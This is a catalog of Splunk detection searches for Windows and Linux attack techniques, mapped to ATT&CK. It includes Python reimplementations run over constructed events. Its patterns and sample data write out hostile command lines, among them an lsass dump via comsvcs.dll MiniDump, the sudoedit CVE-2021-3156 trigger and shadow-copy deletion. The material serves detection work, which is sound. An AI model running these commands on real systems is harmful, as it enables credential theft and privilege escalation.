ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction native microsoft debuggers peek into the kernel

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. Native Microsoft debuggers, such as kd, ntkd, livekd and windbg, can be leveraged to read credential material directly from memory and process dumps.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND parent_process_name != null AND process_name != null AND ( match_regex(parent_process_name, /(?i)ntkd\.exe/)=true OR match_regex(parent_process_name, /(?i)livekd\.exe/)=true ) AND match_regex(process_name, /(?i)conhost\.exe/)=true AND match_regex(cmd_line, /(?i)0xffffffff/)=true AND match_regex(cmd_line, /(?i)\-ForceV1/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • process_name
  • parent_process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, using debuggers this way may be indicative of developers analyzing crash dumps of their code. Note, even for developers this is an unusual way of working on code - debuggers are mostly used to step through code, not analyze its crash dumps.

Reference


Test Dataset

version: 1


Credential extraction native microsoft debuggers via z command line option

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. Native Microsoft debuggers, such as kd, ntkd, livekd and windbg, can be leveraged to read credential material directly from memory and process dumps.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null) | where cmd_line != null AND process_name != null AND ( match_regex(process_name, /^(?i)ntkd\.exe/)=true OR match_regex(process_name, /^(?i)kd\.exe/)=true ) AND match_regex(cmd_line, /(?i)\-z\s+/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, using debuggers this way may be indicative of developers analyzing crash dumps of their code. Note, even for developers this is an unusual way of working on code - debuggers are mostly used to step through code, not analyze its crash dumps.

Reference

Test Dataset

version: 1


Credential extraction via get-addbaccount module present in powersploit and dsinternals

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. PowerSploit and DSInternals are common exploit APIs offering PowerShell modules for various exploits of Windows and Active Directory environments.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND match_regex(cmd_line, /(?i)Get-ADDBAccount/)=true AND match_regex(cmd_line, /(?i)\-dbpath[\s;:\.\ |]+/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Deleting shadow copies

The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1490
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe OR Processes.process_name=wmic.exe) Processes.process=*delete* Processes.process=*shadow* by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `deleting_shadow_copies_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1490 Inhibit System Recovery Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

vssadmin.exe and wmic.exe are standard applications shipped with modern versions of Windows. They may be used by administrators to legitimately delete old backup copies, although this is typically rare.

Reference

Test Dataset


version: 4


Detect activity related to pass the hash attacks

This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts at using the Pass-the-Hash technique.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1550.002
  • Last Updated: 2020-10-15

Search

`wineventlog_security` EventCode=4624 (Logon_Type=3 Logon_Process=NtLmSsp WorkstationName=WORKSTATION NOT AccountName="ANONYMOUS LOGON") OR (Logon_Type=9 Logon_Process=seclogo) | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by EventCode, Logon_Type, WorkstationName, user, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_activity_related_to_pass_the_hash_attacks_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must ingest your Windows Security Event logs and leverage the latest TA for Windows.
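The filter and aggregation of the search above, reimplemented in Python over constructed 4624 events so the two logon patterns (NTLM network logon from a source calling itself "WORKSTATION", and Logon_Type 9 via seclogo) can be checked offline. This is an added example for this page, not Splunk's own code; the sample events and their field values are constructed.

```python
"""Detection logic of the 'Detect activity related to pass the hash attacks' search,
reimplemented in Python over constructed Windows Security 4624 events.
Added example for this page; it is not Splunk's own code."""
from typing import Dict, Iterable, List, Tuple

Event = Dict[str, object]

# Constructed sample events (not a real capture). Field names mirror the
# Splunk search: EventCode, Logon_Type, Logon_Process, WorkstationName,
# AccountName, user, dest.
SAMPLE_EVENTS: List[Event] = [
    # NTLM network logon whose source claims the generic name "WORKSTATION"
    {"_time": 1000, "EventCode": 4624, "Logon_Type": 3, "Logon_Process": "NtLmSsp",
     "WorkstationName": "WORKSTATION", "AccountName": "alice", "user": "alice",
     "dest": "srv01"},
    {"_time": 1060, "EventCode": 4624, "Logon_Type": 3, "Logon_Process": "NtLmSsp",
     "WorkstationName": "WORKSTATION", "AccountName": "alice", "user": "alice",
     "dest": "srv01"},
    # anonymous NTLM logon: the search excludes it explicitly
    {"_time": 1100, "EventCode": 4624, "Logon_Type": 3, "Logon_Process": "NtLmSsp",
     "WorkstationName": "WORKSTATION", "AccountName": "ANONYMOUS LOGON",
     "user": "ANONYMOUS LOGON", "dest": "srv01"},
    # NTLM network logon from a normally named workstation: benign
    {"_time": 1200, "EventCode": 4624, "Logon_Type": 3, "Logon_Process": "NtLmSsp",
     "WorkstationName": "WS-ALICE", "AccountName": "alice", "user": "alice",
     "dest": "srv01"},
    # Logon_Type 9 (NewCredentials) through seclogo: the search's second pattern
    {"_time": 1300, "EventCode": 4624, "Logon_Type": 9, "Logon_Process": "seclogo",
     "WorkstationName": "WS-BOB", "AccountName": "bob", "user": "bob", "dest": "ws-bob"},
    # Kerberos interactive logon: benign
    {"_time": 1400, "EventCode": 4624, "Logon_Type": 2, "Logon_Process": "Kerberos",
     "WorkstationName": "WS-CAROL", "AccountName": "carol", "user": "carol",
     "dest": "ws-carol"},
    # failed logon (4625): outside the search's EventCode filter
    {"_time": 1500, "EventCode": 4625, "Logon_Type": 3, "Logon_Process": "NtLmSsp",
     "WorkstationName": "WORKSTATION", "AccountName": "dave", "user": "dave",
     "dest": "srv01"},
]

# The "by" clause of the stats command in the search.
GROUP_BY = ("EventCode", "Logon_Type", "WorkstationName", "user", "dest")


def _eq(ev: Event, field: str, value: str) -> bool:
    """SPL compares field values case-insensitively; mimic that for strings."""
    return str(ev.get(field, "")).lower() == value.lower()


def is_pth_candidate(ev: Event) -> bool:
    """The filter of the search: EventCode 4624 with either logon pattern."""
    if ev.get("EventCode") != 4624:
        return False
    ntlm_from_generic_workstation = (
        ev.get("Logon_Type") == 3
        and _eq(ev, "Logon_Process", "NtLmSsp")
        and _eq(ev, "WorkstationName", "WORKSTATION")
        and not _eq(ev, "AccountName", "ANONYMOUS LOGON")
    )
    new_credentials_via_seclogo = (
        ev.get("Logon_Type") == 9 and _eq(ev, "Logon_Process", "seclogo")
    )
    return ntlm_from_generic_workstation or new_credentials_via_seclogo


def aggregate(events: Iterable[Event]) -> Dict[Tuple, Dict[str, int]]:
    """stats count min(_time) as firstTime max(_time) as lastTime by GROUP_BY.
    `fillnull` in the search gives absent fields the value 0 so rows still group."""
    rows: Dict[Tuple, Dict[str, int]] = {}
    for ev in events:
        if not is_pth_candidate(ev):
            continue
        key = tuple(ev.get(f, 0) for f in GROUP_BY)
        row = rows.setdefault(
            key, {"count": 0, "firstTime": ev["_time"], "lastTime": ev["_time"]}
        )
        row["count"] += 1
        row["firstTime"] = min(row["firstTime"], ev["_time"])
        row["lastTime"] = max(row["lastTime"], ev["_time"])
    return rows


if __name__ == "__main__":
    for key, row in aggregate(SAMPLE_EVENTS).items():
        print(dict(zip(GROUP_BY, key)), row)
```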

Required field

ATT&CK

ID Technique Tactic
T1550.002 Pass the Hash Defense Evasion, Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate logon activity by authorized NTLM systems may be detected by this search. Please investigate as appropriate.

Reference

Test Dataset


version: 5


Detect baron samedit cve-2021-3156

This search detects the heap-based buffer overflow in sudoedit.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1068
  • Last Updated: 2021-01-27

Search

`linux_hosts` | search "sudoedit -s \\" | `detect_baron_samedit_cve_2021_3156_filter`

Associated Analytic Story


How To Implement

This search requires a Splunk Universal Forwarder running on Linux systems, capturing logs from the /var/log directory. The vulnerability is exposed when a non-privileged user passes a single \ character at the end of the command while using the shell and edit flags.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

unknown

Reference


Test Dataset

version: 1


Detect baron samedit cve-2021-3156 segfault

This search detects the heap-based buffer overflow in sudoedit.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1068
  • Last Updated: 2021-01-29

Search

`linux_hosts` | search sudoedit segfault | stats count min(_time) as firstTime max(_time) as lastTime by host | search count > 5 | `detect_baron_samedit_cve_2021_3156_segfault_filter`

Associated Analytic Story


How To Implement

This search requires a Splunk Universal Forwarder running on Linux systems (tested on CentOS and Ubuntu) where segfaults are being logged. This also captures instances where the exploit has been compiled into a binary. The detection looks for more than 5 instances of sudoedit combined with segfault on a single host over your search time period.
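The keyword filter and per-host threshold of the search above, reimplemented in Python over constructed syslog lines so the "count > 5" behaviour can be checked offline. This is an added example for this page, not Splunk's own code; the sample lines, host names and the assumed year used for timestamp parsing are constructed.

```python
"""Threshold logic of the 'Detect baron samedit cve-2021-3156 segfault' search,
reimplemented in Python over constructed Linux syslog lines.
Added example for this page; it is not Splunk's own code."""
import re
from datetime import datetime
from typing import Dict, Iterable, List, Optional

# Constructed sample lines in BSD syslog layout (not a real capture):
# "Mon DD HH:MM:SS host tag: message". The year is assumed when parsing.
SAMPLE_LINES: List[str] = (
    # seven sudoedit segfaults on web01: crosses the "count > 5" threshold
    [f"Jan 29 08:00:{i:02d} web01 kernel: sudoedit[41{i:02d}]: segfault at 0 "
     f"ip 00007f1c sp 00007ffd error 4 in libc-2.31.so" for i in range(7)]
    # three on db02: stays under the threshold
    + [f"Jan 29 08:05:{i:02d} db02 kernel: sudoedit[52{i:02d}]: segfault at 0 "
       f"ip 00007f1c sp 00007ffd error 4 in libc-2.31.so" for i in range(3)]
    # noise: a segfault of another program, and a sudoedit line without a segfault
    + ["Jan 29 08:06:00 web01 kernel: sshd[777]: segfault at 8 ip 0000556a "
       "sp 00007ffc error 4 in sshd",
       "Jan 29 08:07:00 web01 sudo: alice : TTY=pts/0 ; COMMAND=sudoedit /etc/hosts"]
)

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<msg>.*)$"
)
ASSUMED_YEAR = 2021  # BSD syslog timestamps carry no year; assumption for this example


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Split a BSD syslog line into _time, host and _raw; None if it does not parse."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"_time": ts, "host": m["host"], "_raw": line}


def mentions_sudoedit_segfault(raw: str) -> bool:
    """`search sudoedit segfault` is an AND of two case-insensitive keywords."""
    low = raw.lower()
    return "sudoedit" in low and "segfault" in low


def count_by_host(lines: Iterable[str]) -> Dict[str, Dict[str, object]]:
    """stats count min(_time) as firstTime max(_time) as lastTime by host."""
    rows: Dict[str, Dict[str, object]] = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or not mentions_sudoedit_segfault(ev["_raw"]):
            continue
        row = rows.setdefault(
            ev["host"], {"count": 0, "firstTime": ev["_time"], "lastTime": ev["_time"]}
        )
        row["count"] += 1
        row["firstTime"] = min(row["firstTime"], ev["_time"])
        row["lastTime"] = max(row["lastTime"], ev["_time"])
    return rows


def hosts_over_threshold(lines: Iterable[str], threshold: int = 5) -> List[str]:
    """`search count > 5`: only hosts strictly above the threshold are reported."""
    return sorted(
        host for host, row in count_by_host(lines).items() if row["count"] > threshold
    )


if __name__ == "__main__":
    for host, row in count_by_host(SAMPLE_LINES).items():
        print(host, row)
    print("alerting hosts:", hosts_over_threshold(SAMPLE_LINES))
```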

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

If sudoedit is throwing segfaults for other reasons this will pick those up too.

Reference


Test Dataset

version: 1


Detect baron samedit cve-2021-3156 via osquery

This search detects attempts to trigger the heap-based buffer overflow in sudoedit (CVE-2021-3156) using osquery process events.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1068
  • Last Updated: 2021-01-28

Search

`osquery_process` | search "columns.cmdline"="sudoedit -s \\*" | `detect_baron_samedit_cve_2021_3156_via_osquery_filter`

Associated Analytic Story


How To Implement

osquery installed and configured to collect process events (see https://osquery.io), together with the Splunk osquery add-on https://splunkbase.splunk.com/app/4402. The vulnerability is triggered when a non-privileged user passes a single `\` character at the end of the command while using the shell and edit flags.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

unknown

Reference


Test Dataset

version: 1
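
The three Baron Samedit searches above reduce to a substring check, a per-host threshold and a prefix match on an osquery column. The following Python is an added example, not part of Splunk's content: it runs those three checks over constructed syslog, kernel and osquery records. The hostnames, PIDs, addresses and the exact log line layout are illustrative, and the function names are this example's own.

```python
from collections import Counter

# Constructed syslog-style sudo lines; the layout is illustrative, not an exact sudo log format.
AUTH_LOG = [
    "Jan 27 10:01:02 web01 sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/sudoedit -s \\",
    "Jan 27 10:01:05 web01 sudo: alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/sudoedit /etc/hosts",
    "Jan 27 10:02:00 db01 sudo: bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/apt update",
]

# Constructed kernel segfault lines: six on web01 (a crashing exploit loop) and two on db01.
KERNEL_LOG = [
    f"Jan 29 10:00:{i:02d} web01 kernel: sudoedit[{2000 + i}]: segfault at 0 ip 00007f3b1c2d4e5f "
    f"sp 00007ffd9c1e2a30 error 4 in libc-2.31.so"
    for i in range(6)
] + [
    "Jan 29 10:05:00 db01 kernel: sudoedit[3001]: segfault at 0 ip 00007f3b1c2d4e5f sp 00007ffd9c1e2a30 error 4 in libc-2.31.so",
    "Jan 29 10:05:01 db01 kernel: sudoedit[3002]: segfault at 0 ip 00007f3b1c2d4e5f sp 00007ffd9c1e2a30 error 4 in libc-2.31.so",
]

# Constructed osquery process rows, shaped like the add-on's "columns" map.
OSQUERY_EVENTS = [
    {"host": "web01", "columns": {"cmdline": "sudoedit -s \\", "uid": "1001"}},
    {"host": "web01", "columns": {"cmdline": "sudoedit -s /etc/motd", "uid": "1001"}},
    {"host": "db01", "columns": {"cmdline": "/usr/bin/vim /etc/hosts", "uid": "1002"}},
]

TRIGGER = "sudoedit -s \\"   # the literal `sudoedit -s \` the first search looks for


def syslog_host(line):
    """Return the hostname field of a traditional syslog line (4th whitespace-separated field)."""
    return line.split()[3]


def find_sudoedit_backslash(lines):
    """Search 1: lines whose sudoedit invocation ends in a lone backslash after -s."""
    return [line for line in lines if TRIGGER in line]


def segfault_hosts(lines, threshold=5):
    """Search 2: hosts with more than `threshold` sudoedit segfaults in the supplied window."""
    counts = Counter(syslog_host(line) for line in lines if "sudoedit" in line and "segfault" in line)
    return {host: n for host, n in counts.items() if n > threshold}


def osquery_hits(events):
    """Search 3: osquery rows whose cmdline starts with the trigger (the SPL `"sudoedit -s \\*"` wildcard)."""
    return [e for e in events if e["columns"].get("cmdline", "").startswith(TRIGGER)]


if __name__ == "__main__":
    for hit in find_sudoedit_backslash(AUTH_LOG):
        print("sudoedit trigger:", hit)
    print("segfault hosts over threshold:", segfault_hosts(KERNEL_LOG))
    print("osquery hits:", [(e["host"], e["columns"]["cmdline"]) for e in osquery_hits(OSQUERY_EVENTS)])
```

Note that the second check is purely a count: a host whose sudoedit crashes for an unrelated reason more than five times in the window is reported too, which is the false positive the segfault search itself documents.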


Detect computer changed with anonymous account

This search looks for Event Code 4742 (Computer Change) or EventCode 4624 (An account was successfully logged on) with an anonymous account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1210
  • Last Updated: 2020-09-18

Search

`wineventlog_security` EventCode=4624 OR EventCode=4742 TargetUserName="ANONYMOUS LOGON" LogonType=3 | stats count values(host) as host, values(TargetDomainName) as Domain, values(user) as user | `detect_computer_changed_with_anonymous_account_filter`

Associated Analytic Story


How To Implement

This search requires audit computer account management to be enabled on the system in order to generate Event ID 4742. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Event Logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1210 Exploitation of Remote Services Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None thus far found

Reference


Test Dataset

version: 1


Detect credential dumping through lsass access

This search looks for reading lsass memory consistent with credential dumping.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-03

Search

`sysmon` EventCode=10 TargetImage=*lsass.exe (GrantedAccess=0x1010 OR GrantedAccess=0x1410) | stats count min(_time) as firstTime max(_time) as lastTime by Computer, SourceImage, SourceProcessId, TargetImage, TargetProcessId, EventCode, GrantedAccess | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_credential_dumping_through_lsass_access_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 10 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The activity may be legitimate. Other tools can access lsass for legitimate reasons, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise.

Reference

Test Dataset


version: 3


Detect dump lsass memory using comsvcs

This search detects the memory of lsass.exe being dumped for offline credential theft attack.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003.003
  • Last Updated: 2020-09-15

Search

| from read_ssa_enriched_events() | eval tenant=ucast(map_get(input_event, "_tenant"), "string", null), machine=ucast(map_get(input_event, "dest_device_id"), "string", null), process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), process=lower(ucast(map_get(input_event, "process"), "string", null)) | where process_name LIKE "%rundll32.exe%" AND match_regex(process, /(?i)comsvcs.dll[,\s]+MiniDump/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend(machine), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including Windows command line logging. You can see how we test this with [Event Code 4688](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4688a) on the [attack_range](https://github.com/splunk/attack_range/blob/develop/ansible/roles/windows_common/tasks/windows-enable-4688-cmd-line-audit.yml).

Required field

  • process_name
  • _tenant
  • _time
  • dest_device_id
  • process


ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1
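
The two credential-dumping searches above (Sysmon EventCode 10 access to lsass.exe with GrantedAccess 0x1010 or 0x1410, and rundll32.exe loading comsvcs.dll's MiniDump export) are reproduced in the following Python. It is an added example, not Splunk's code, and runs over constructed Sysmon and process-creation records; hostnames, PIDs and paths are illustrative. It also goes one step beyond the exact-match search: with `exact=False` it decodes the GrantedAccess bitmask and flags any access that includes PROCESS_VM_READ, which catches a full-access mask such as 0x1fffff that the literal comparison misses.

```python
import re

# Windows process access rights (winnt.h); GrantedAccess in Sysmon event 10 is a bitmask of these.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
EXACT_MASKS = {0x1010, 0x1410}   # the two masks the Sysmon search above matches literally

# Constructed Sysmon EventCode 10 records (field names follow the Sysmon TA).
SYSMON_10 = [
    {"UtcTime": "2019-12-03 10:00:01", "Computer": "ws01", "SourceImage": r"C:\Users\alice\mimikatz.exe",
     "SourceProcessId": "4120", "TargetImage": r"C:\Windows\system32\lsass.exe", "TargetProcessId": "624",
     "GrantedAccess": "0x1010"},
    {"UtcTime": "2019-12-03 10:00:02", "Computer": "ws01", "SourceImage": r"C:\Users\alice\mimikatz.exe",
     "SourceProcessId": "4120", "TargetImage": r"C:\Windows\system32\lsass.exe", "TargetProcessId": "624",
     "GrantedAccess": "0x1010"},
    {"UtcTime": "2019-12-03 10:05:00", "Computer": "ws02", "SourceImage": r"C:\Tools\procdump64.exe",
     "SourceProcessId": "5200", "TargetImage": r"C:\Windows\system32\lsass.exe", "TargetProcessId": "640",
     "GrantedAccess": "0x1fffff"},   # full access: missed by the exact match, caught by the bitmask check
    {"UtcTime": "2019-12-03 10:06:00", "Computer": "ws02", "SourceImage": r"C:\Windows\system32\taskmgr.exe",
     "SourceProcessId": "3100", "TargetImage": r"C:\Windows\system32\lsass.exe", "TargetProcessId": "640",
     "GrantedAccess": "0x1400"},     # query only, no VM_READ: benign
    {"UtcTime": "2019-12-03 10:07:00", "Computer": "ws02", "SourceImage": r"C:\Users\bob\tool.exe",
     "SourceProcessId": "3300", "TargetImage": r"C:\Windows\system32\svchost.exe", "TargetProcessId": "900",
     "GrantedAccess": "0x1010"},     # not lsass
]


def lsass_access(events, exact=True):
    """Aggregate lsass.exe process-access events by (Computer, SourceImage, SourceProcessId, GrantedAccess).

    exact=True reproduces the search above (GrantedAccess is 0x1010 or 0x1410);
    exact=False flags any mask carrying PROCESS_VM_READ, the right needed to read credential material."""
    groups = {}
    for ev in events:
        if not ev["TargetImage"].lower().endswith("lsass.exe"):
            continue
        mask = int(ev["GrantedAccess"], 16)
        if exact and mask not in EXACT_MASKS:
            continue
        if not exact and not mask & PROCESS_VM_READ:
            continue
        key = (ev["Computer"], ev["SourceImage"], ev["SourceProcessId"], ev["GrantedAccess"])
        g = groups.setdefault(key, {"count": 0, "firstTime": ev["UtcTime"], "lastTime": ev["UtcTime"]})
        g["count"] += 1
        g["firstTime"] = min(g["firstTime"], ev["UtcTime"])
        g["lastTime"] = max(g["lastTime"], ev["UtcTime"])
    return groups


# Same pattern as the SPL2 search, with the dot in the DLL name escaped.
COMSVCS_MINIDUMP = re.compile(r"comsvcs\.dll[,\s]+MiniDump", re.IGNORECASE)

# Constructed process-creation records: process name plus full command line.
PROCESS_EVENTS = [
    {"dest_device_id": "ws01", "process_name": "rundll32.exe",
     "process": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\lsass.dmp full"},
    {"dest_device_id": "ws01", "process_name": "rundll32.exe",
     "process": r"rundll32.exe comsvcs.dll MiniDump 624 C:\Temp\l.dmp full"},
    {"dest_device_id": "ws01", "process_name": "rundll32.exe",
     "process": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"dest_device_id": "ws03", "process_name": "powershell.exe",
     "process": r"powershell.exe -c rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\lsass.dmp full"},
]


def comsvcs_minidump(events):
    """Return events where rundll32.exe invokes comsvcs.dll's MiniDump export.

    The search keys on process_name, so the fourth record (the same command line carried
    inside a powershell.exe process event) is not matched; only the child rundll32.exe event would be."""
    return [ev for ev in events
            if "rundll32.exe" in ev["process_name"].lower() and COMSVCS_MINIDUMP.search(ev["process"])]


if __name__ == "__main__":
    for key, agg in lsass_access(SYSMON_10, exact=False).items():
        print("lsass access:", key, agg)
    for ev in comsvcs_minidump(PROCESS_EVENTS):
        print("comsvcs MiniDump:", ev["dest_device_id"], ev["process"])
```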


Detect excessive account lockouts from endpoint

This search identifies endpoints that have caused a relatively high number of account lockouts in a short period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.002
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Changes.user) as user from datamodel=Change.All_Changes where nodename=All_Changes.Account_Management All_Changes.result="lockout" by All_Changes.dest All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_account_lockouts_from_endpoint_filter`

Associated Analytic Story


How To Implement

You must ingest your Windows security event logs into the `Change` datamodel under the `Account_Management` nodename for this search to execute successfully. Consider updating the cron schedule and the count of lockouts you want to monitor according to your environment.

Splunk>Phantom Playbook Integration

If Splunk>Phantom is also configured in your environment, a Playbook called "Excessive Account Lockouts Enrichment and Response" can be configured to run when any results are found by this detection search. The Playbook executes the Contextual and Investigative searches in this Story, conducts additional information gathering on Windows endpoints, and takes a response action to shut down the affected endpoint. To use this integration, install the Phantom App for Splunk (https://splunkbase.splunk.com/app/3411/), add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active (Playbook Link: https://my.phantom.us/4.1/playbook/excessive-account-lockouts-enrichment-and-response/).


Required field

ATT&CK

ID Technique Tactic
T1078.002 Domain Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a widely used system, such as a kiosk, could cause a large number of account lockouts.

Reference

Test Dataset


version: 5


Detect excessive user account lockouts

This search detects user accounts that have been locked out a relatively high number of times in a short period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Change.All_Changes where nodename=All_Changes.Account_Management All_Changes.result="lockout" by All_Changes.user All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_user_account_lockouts_filter`

Associated Analytic Story


How To Implement

